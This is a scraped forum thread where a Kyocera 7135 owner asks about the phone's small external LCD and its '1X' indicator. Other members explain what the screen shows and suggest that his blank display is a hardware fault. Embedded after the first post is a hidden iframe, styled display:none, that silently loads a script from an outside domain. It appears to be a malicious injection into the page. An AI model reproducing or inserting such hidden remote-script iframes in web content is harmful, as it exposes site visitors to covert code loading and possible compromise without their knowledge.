+ Reply to Thread

Thread: LCD screen

LCD screen

My 7135 has (as all others do) a small LCD screen on the top of it. Now the reference manual (p6) labels this as 3 - LED which in fact is incorrect as the LCD is almost opposite the antenna.

I have been seeking the reason for the little screen and what makes it do whatever it should do.

Can anybody enlighten me or point me in the right direction??

Oh and one other little thing - instead of a D for digital appearing in the top left of my phone screen I have 1X - I did read somewhere in the forums about a 2X RTXX or similar but that was a bit above my level - can someone tell me (slowly) what that means?:splitspin

Cheers

Chris<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Chris

Ok, Pulling up the Reference Manual to make sure I know what you are looking at....

Ok, I see what you are talking about.

The reference manual should statte that #3 is LCD, NOT LED. The LCD is for (When not a call) Signal strength, time and battery level. Also does caller ID (This is correctly labled in the User Guide.

The LED Is on the hinge toward the front of the phone and does what the Reference guide says.

Thought it Only really does anything when a call is in place (There is a thread on LED in the FAQ I am pretty sure.)

Hope that helps.

I am not really positive on the 1X/2X questions But I know thet the verizon release will show a 1X instead of a D when you are in a digital area. This basically has to do with Data calls and the speeds.
    Walt

It's in the manual.

I remember a thread on it also.

Motorola's blink when there is service. That confused me on this one...

Walt

Many thanks for that info. My LCD screen is completely dormant and despite some searching I have not discovered any more about it. Is there a process to turn it on??

Cheers

Chris
    Chris

Administrator
    the "d" or "1X" means you are on the 3g network (high speed data vs. the old 14.4k). some older phones witih older software have the "D" while the neweer firmware/phones have the "1X"...

Originally posted by Chris
    Walt

Many thanks for that info. My LCD screen is completely dormant and despite some searching I have not discovered any more about it. Is there a process to turn it on??

Cheers

Chris
    Chris,

Just checking-- You are referring to the LCD screen, about 1" long by 1/4" wide, and not the little blinky LED light, that you can see from the inside of the phone with the flip open as well as outside? Also, presuming yes, when you say completely dormant, do you mean that the display has information on it, but the green light never comes on? Or that the green light comes on, but it never displays any information (battery strength, signal, etc.)? Or that it does neither? The reason I'm asking is because the first 7135 I had, the green light would come on on the LCD window, but there was never any information in it. This was a hardware issue, and an exchange was the answer....

Indeed it is the lcd screen long and narrow on top of the phone and visible with the lid closed. The LCD has nothing - no light, no text no graphics - it's totally turned off or dead. I have never seen it do anything at all .

Cheers & thanks

Chris
    Chris

If yours doesn't show anything, and the battery is not dead, there is probably something wrong with your phone. It should show the time and battery level and if the phone is on, signal strength. You should be able to get it to light up when the flip is closed by pushing one of the side buttons.
    Taylor Made Web Sites and Domain Services
    Happy Kyocera 7135 User 2003-2008. Now Treo 800w.

Cheers all - I shall revisit brer Telecom tomorrow and purvey to them the happy news - thus getting the phone fixed or replaced.

Cheers & thanks

Chris:p
    Chris